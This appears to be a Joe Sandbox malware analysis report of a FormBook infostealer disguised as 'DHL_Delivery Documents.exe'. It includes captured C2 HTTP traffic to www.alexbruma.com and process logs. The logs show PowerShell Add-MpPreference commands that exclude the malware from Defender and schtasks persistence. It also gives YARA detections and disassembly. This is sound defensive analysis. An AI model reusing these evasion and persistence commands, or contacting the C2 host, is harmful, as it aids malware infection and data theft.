                      Data Raw: 55 72 66 3d 38 5a 6b 6c 74 72 53 34 42 45 45 4d 69 71 6f 49 58 34 4e 2b 4c 4f 68 76 44 6c 72 5a 75 4b 36 4f 41 32 4c 55 36 70 56 54 2b 58 77 53 45 31 66 69 50 58 59 36 4f 50 6a 6f 59 2b 6d 71 75 30 75 41 67 65 64 43 72 6f 47 72 55 6c 75 49 57 55 71 4c 38 61 71 2f 70 56 63 47 7a 6c 4d 59 5a 72 51 51 34 77 5a 55 71 65 39 36 58 71 2b 54 51 76 53 62 54 32 73 50 46 6e 6b 6c 66 63 33 35 64 78 75 75 6f 31 50 44 55 70 64 5a 42 4e 6e 31 2f 7a 30 6b 42 71 53 63 33 45 52 59 79 30 57 44 2f 43 78 2b 57 78 64 6e 64 70 38 61 50 78 69 51 42 39 6e 53 34 35 70 38 6b 64 36 75 2f 50 73 73 65 63 48 6c 4f 79 50 69 54 58 45 6a 4a 69 67 75 50 37 4f 59 46 50 52 44 79 58 39 49 4c 47 34 50 61 72 4d 53 58 59 6a 42 37 65 34 61 4e 62 71 59 77 6d 41 6a 35 38 71 64 4c 7a 76 72 2f 76 6d 39 61 59 49 65 72 69 34 4b 6e 68 6a 6e 6b 2b 2b 39 46 31 54 4b 62 42 34 42 72 59 53 61 51 64 56 32 59 66 73 36 42 50 4d 4c 2f 59 49 43 7a 30 34 53 61 33 79 53 4b 4f 68 44 2f 43 44 6a 37 62 6e 36 2f 36 50 6e 73 63 43 42 71 46 74 66 44 62 41 66 30 71 [TRUNCATED]
                      Data Ascii: Urf=8ZkltrS4BEEMiqoIX4N+LOhvDlrZuK6OA2LU6pVT+XwSE1fiPXY6OPjoY+mqu0uAgedCroGrUluIWUqL8aq/pVcGzlMYZrQQ4wZUqe96Xq+TQvSbT2sPFnklfc35dxuuo1PDUpdZBNn1/z0kBqSc3ERYy0WD/Cx+Wxdndp8aPxiQB9nS45p8kd6u/PssecHlOyPiTXEjJiguP7OYFPRDyX9ILG4ParMSXYjB7e4aNbqYwmAj58qdLzvr/vm9aYIeri4Knhjnk++9F1TKbB4BrYSaQdV2Yfs6BPML/YICz04Sa3ySKOhD/CDj7bn6/6PnscCBqFtfDbAf0qJVyLf0zw7GmR3HoeSxr/yaWT+s7RQ8R22Z1EnMq1QVIA3rsIKouJkmS22m8hQ9wrV0xxk7m57OVU4Ns0Nq01z4AGAxDabLVd4NpYas8I3BTBG0AxiloxrwD7FP19trYcbR3XuOsBT0xRR6t/lG2nki3az7MNsW+6Su8jeVs6HqqqO3T2WCijkDMarhSc0yeo5/wH6mMas0citH8Nn5/Y6am6/Jx+4S6FXn4+Lsor3cs52sIjOFPmrtBiHQoanWoGbVs7TkPs2uhOlnFE83bfHfCDORs7dbdBHkubhZQSxTtXZy5h+wwPJBaIFoW1G7sZKxMVnZ8OYzlRvoe7WU0R77VJsL3Dkp3LUhh1jkJjITV9dX7P94UpdLDuSoTZM9yZrmIFMOlaDqzS3WdR4YzQCocPeY2Wb8XCHvH5rIGmUMqyMxPoJ+eTiI7gtv3sPfsxP4J49zKYMApi45lYeu7zarOy5c1lAE9e0S/Qag4iQBqVDwdvqoFC18K2QplzjcRGhQjZKrztqzSXF4VbfIv/d7GdlqXjS3ZDCNLUs6pFQu/1AzCRpCxKJVRs7W9OxWY87JKJtQxFvN0ALjtFuZlXxtzoYv99aZ84Utph8Xumsk030p8EznkHEsZIsIJiAqmNKIEscCFN00LE0rrgCHVVunrz+WpFbePRNm [TRUNCATED]
                      May 23, 2024 20:29:36.015850067 CEST824INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:29:35 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Transfer-Encoding: chunked
                      Connection: close
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N2WnHi2%2Fo01hPAdXMSd%2BMF9RsM2LjNCZc931bGtsT0%2BpaQ9liOpp4p1QAGFrE6%2BJ%2B%2F0GmQF0%2BrXcPteoLI74c2xDdEFGBLHQ21583ib450RLHFXQmKPbBNCNGS3sWZ2m9TndGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88871cc21cd58c45-EWR
                      Content-Encoding: gzip
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb 78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd 01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: adL=@D{~J/rs|DDbsky2/9:Y1KdxkpHW+HsC-0R3upQP/f=hYAu}zXx,8nFy~~b90


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.549714172.67.214.17801352C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:29:37.797410965 CEST511OUTGET /0eyj/?Urf=xbMFueOYBXYurIwiepFnO71qLlyP3ujEHyf23sFAywtga3bqBhIKPev0K8adiimIvdV9j6fOUj2Pc2CkptCWxRwbiV0KWskIok5o/u5VAK+QdqKfe3RHCloueJvNBgPjzg==&pP=fPyhqn_HwdI HTTP/1.1
                      Host: www.alexbruma.com
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-US
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                      May 23, 2024 20:29:38.578330994 CEST810INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:29:38 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Transfer-Encoding: chunked
                      Connection: close
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=goUQgH9ohKt1fmph30M6OlTfSSoEVX%2BnI%2BjIrBrD%2F3AN%2BT5WbfBSA7l9RjOMhkuzkRCPVlWXzuEnxV3Aurtf3H7jwG3Z4%2BH55oS6ywv69uZWnVIYB2k2LS0mkZzUWjnXkfzZKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88871cd1ee21423f-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 30 65 79 6a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /0eyj/ was not found on this server.</p></body></html>0


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:14:27:44
                      Start date:23/05/2024
                      Path:C:\Users\user\Desktop\DHL_Delivery Documents.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\DHL_Delivery Documents.exe"
                      Imagebase:0x9d0000
                      File size:939'520 bytes
                      MD5 hash:9C930DA2AC186C1F945A7BC74AA491ED
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:2
                      Start time:14:27:46
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
                      Imagebase:0xdf0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:3
                      Start time:14:27:46
                      Start date:23/05/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:4
                      Start time:14:27:46
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
                      Imagebase:0xdf0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:5
                      Start time:14:27:46
                      Start date:23/05/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:6
                      Start time:14:27:47
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp"
                      Imagebase:0x7c0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:7
                      Start time:14:27:47
                      Start date:23/05/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:8
                      Start time:14:27:48
                      Start date:23/05/2024
                      Path:C:\Users\user\Desktop\DHL_Delivery Documents.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\DHL_Delivery Documents.exe"
                      Imagebase:0xfa0000
                      File size:939'520 bytes
                      MD5 hash:9C930DA2AC186C1F945A7BC74AA491ED
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:9
                      Start time:14:27:49
                      Start date:23/05/2024
                      Path:C:\Users\user\AppData\Roaming\YybGLWQSx.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\YybGLWQSx.exe
                      Imagebase:0x90000
                      File size:939'520 bytes
                      MD5 hash:9C930DA2AC186C1F945A7BC74AA491ED
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 55%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:10
                      Start time:14:27:50
                      Start date:23/05/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff6ef0c0000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:11
                      Start time:14:27:53
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp"
                      Imagebase:0x7c0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:12
                      Start time:14:27:53
                      Start date:23/05/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:13
                      Start time:14:27:54
                      Start date:23/05/2024
                      Path:C:\Users\user\AppData\Roaming\YybGLWQSx.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
                      Imagebase:0xae0000
                      File size:939'520 bytes
                      MD5 hash:9C930DA2AC186C1F945A7BC74AA491ED
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:17
                      Start time:14:28:36
                      Start date:23/05/2024
                      Path:C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe"
                      Imagebase:0x600000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:18
                      Start time:14:28:37
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\setx.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\SysWOW64\setx.exe"
                      Imagebase:0x870000
                      File size:46'592 bytes
                      MD5 hash:5B700BC00E451033B2F9EEF349A91D1C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:19
                      Start time:14:28:50
                      Start date:23/05/2024
                      Path:C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe"
                      Imagebase:0x600000
                      File size:140'800 bytes
                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                      Has exited:false

                      General

                      Target ID:20
                      Start time:14:29:10
                      Start date:23/05/2024
                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Imagebase:0x7ff79f9e0000
                      File size:676'768 bytes
                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:8.6%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:53
                        Total number of Limit Nodes:9
                        execution_graph 15569 2c1acd0 15570 2c1acdf 15569->15570 15573 2c1adc7 15569->15573 15581 2c1adc8 15569->15581 15574 2c1add9 15573->15574 15575 2c1adfc 15573->15575 15574->15575 15589 2c1b050 15574->15589 15593 2c1b060 15574->15593 15575->15570 15576 2c1adf4 15576->15575 15577 2c1b000 GetModuleHandleW 15576->15577 15578 2c1b02d 15577->15578 15578->15570 15582 2c1add9 15581->15582 15583 2c1adfc 15581->15583 15582->15583 15587 2c1b050 LoadLibraryExW 15582->15587 15588 2c1b060 LoadLibraryExW 15582->15588 15583->15570 15584 2c1adf4 15584->15583 15585 2c1b000 GetModuleHandleW 15584->15585 15586 2c1b02d 15585->15586 15586->15570 15587->15584 15588->15584 15590 2c1b060 15589->15590 15592 2c1b099 15590->15592 15597 2c1a188 15590->15597 15592->15576 15594 2c1b074 15593->15594 15595 2c1a188 LoadLibraryExW 15594->15595 15596 2c1b099 15594->15596 15595->15596 15596->15576 15598 2c1b240 LoadLibraryExW 15597->15598 15600 2c1b2b9 15598->15600 15600->15592 15601 2c1d6a0 15602 2c1d6e2 DuplicateHandle 15601->15602 15603 2c1d736 15602->15603 15604 2c1d458 15605 2c1d49e GetCurrentProcess 15604->15605 15607 2c1d4f0 GetCurrentThread 15605->15607 15608 2c1d4e9 15605->15608 15609 2c1d526 15607->15609 15610 2c1d52d GetCurrentProcess 15607->15610 15608->15607 15609->15610 15613 2c1d563 15610->15613 15611 2c1d58b GetCurrentThreadId 15612 2c1d5bc 15611->15612 15613->15611 15614 2c14668 15615 2c1467a 15614->15615 15616 2c14686 15615->15616 15618 2c14778 15615->15618 15619 2c1479d 15618->15619 15623 2c14888 15619->15623 15627 2c14878 15619->15627 15625 2c148af 15623->15625 15624 2c1498c 15624->15624 15625->15624 15631 2c1449c 15625->15631 15628 2c14888 15627->15628 15629 2c1449c CreateActCtxA 15628->15629 15630 2c1498c 15628->15630 15629->15630 15632 2c15918 CreateActCtxA 15631->15632 15634 2c159db 15632->15634

                        Executed Functions

                        Function 02C1D449 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 526 2c1d449-2c1d4e7 GetCurrentProcess 530 2c1d4f0-2c1d524 GetCurrentThread 526->530 531 2c1d4e9-2c1d4ef 526->531 532 2c1d526-2c1d52c 530->532 533 2c1d52d-2c1d561 GetCurrentProcess 530->533 531->530 532->533 535 2c1d563-2c1d569 533->535 536 2c1d56a-2c1d585 call 2c1d628 533->536 535->536 539 2c1d58b-2c1d5ba GetCurrentThreadId 536->539 540 2c1d5c3-2c1d625 539->540 541 2c1d5bc-2c1d5c2 539->541 541->540
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 02C1D4D6
                        • GetCurrentThread.KERNEL32 ref: 02C1D513
                        • GetCurrentProcess.KERNEL32 ref: 02C1D550
                        • GetCurrentThreadId.KERNEL32 ref: 02C1D5A9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: c0f07ef3d999ec60db859492e7e5ec6ba691a3e5320ac58db923a1097890b9d1
                        • Instruction ID: 8b5e01e37826f3f6b8869a38b869146f522126bc42487b6794b1692da0cac580
                        • Opcode Fuzzy Hash: c0f07ef3d999ec60db859492e7e5ec6ba691a3e5320ac58db923a1097890b9d1
                        • Instruction Fuzzy Hash: 255169B0D00309DFDB14DFA9D548B9EBBF1EF88308F20849AE40AA7350D7349945CB65
                        Function 02C1D458 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 548 2c1d458-2c1d4e7 GetCurrentProcess 552 2c1d4f0-2c1d524 GetCurrentThread 548->552 553 2c1d4e9-2c1d4ef 548->553 554 2c1d526-2c1d52c 552->554 555 2c1d52d-2c1d561 GetCurrentProcess 552->555 553->552 554->555 557 2c1d563-2c1d569 555->557 558 2c1d56a-2c1d585 call 2c1d628 555->558 557->558 561 2c1d58b-2c1d5ba GetCurrentThreadId 558->561 562 2c1d5c3-2c1d625 561->562 563 2c1d5bc-2c1d5c2 561->563 563->562
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 02C1D4D6
                        • GetCurrentThread.KERNEL32 ref: 02C1D513
                        • GetCurrentProcess.KERNEL32 ref: 02C1D550
                        • GetCurrentThreadId.KERNEL32 ref: 02C1D5A9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: 5b1c25c6b219a3946756909cc05de8000b10ca07b1f5a5cd61c78a04c7ce6cc9
                        • Instruction ID: ce037ff056268b3fa636476bb5cbcd3b9b7fc3842303cb69e24a12d0ef0dc64f
                        • Opcode Fuzzy Hash: 5b1c25c6b219a3946756909cc05de8000b10ca07b1f5a5cd61c78a04c7ce6cc9
                        • Instruction Fuzzy Hash: 1C5135B0D003099FDB14DFAAD549B9EBBF1EF89308F20845AE41AA7350D734A985CB65
                        Function 02C1ADC8 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 592 2c1adc8-2c1add7 593 2c1ae03-2c1ae07 592->593 594 2c1add9-2c1ade6 call 2c193f4 592->594 596 2c1ae09-2c1ae13 593->596 597 2c1ae1b-2c1ae5c 593->597 599 2c1ade8 594->599 600 2c1adfc 594->600 596->597 603 2c1ae69-2c1ae77 597->603 604 2c1ae5e-2c1ae66 597->604 649 2c1adee call 2c1b050 599->649 650 2c1adee call 2c1b060 599->650 600->593 605 2c1ae79-2c1ae7e 603->605 606 2c1ae9b-2c1ae9d 603->606 604->603 608 2c1ae80-2c1ae87 call 2c1a130 605->608 609 2c1ae89 605->609 610 2c1aea0-2c1aea7 606->610 607 2c1adf4-2c1adf6 607->600 611 2c1af38-2c1aff8 607->611 615 2c1ae8b-2c1ae99 608->615 609->615 613 2c1aeb4-2c1aebb 610->613 614 2c1aea9-2c1aeb1 610->614 644 2c1b000-2c1b02b GetModuleHandleW 611->644 645 2c1affa-2c1affd 611->645 618 2c1aec8-2c1aed1 call 2c1a140 613->618 619 2c1aebd-2c1aec5 613->619 614->613 615->610 623 2c1aed3-2c1aedb 618->623 624 2c1aede-2c1aee3 618->624 619->618 623->624 626 2c1af01-2c1af0e 624->626 627 2c1aee5-2c1aeec 624->627 633 2c1af31-2c1af37 626->633 634 2c1af10-2c1af2e 626->634 627->626 628 2c1aeee-2c1aefe call 2c1a150 call 2c1a160 627->628 628->626 634->633 646 2c1b034-2c1b048 644->646 647 2c1b02d-2c1b033 644->647 645->644 647->646 649->607 650->607
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02C1B01E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2079838550.0000000002C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2c10000_DHL_Delivery Documents.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 903ed1142caa3762cac38edc25cc4371d0a7e916633db308baccdd0ed620c3b5
                        • Instruction ID: 2546b197bdf27fd526c2af54b03d82d744fccc8f7bada2d8a86ce078d4d25a7b
                        • Opcode Fuzzy Hash: 903ed1142caa3762cac38edc25cc4371d0a7e916633db308baccdd0ed620c3b5
                        • Instruction Fuzzy Hash: DC8178B0A01B458FDB24DF2AD44575ABBF2FF89304F008A2DD48AD7A40D735E956DB90
                        Function 02C1590C Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
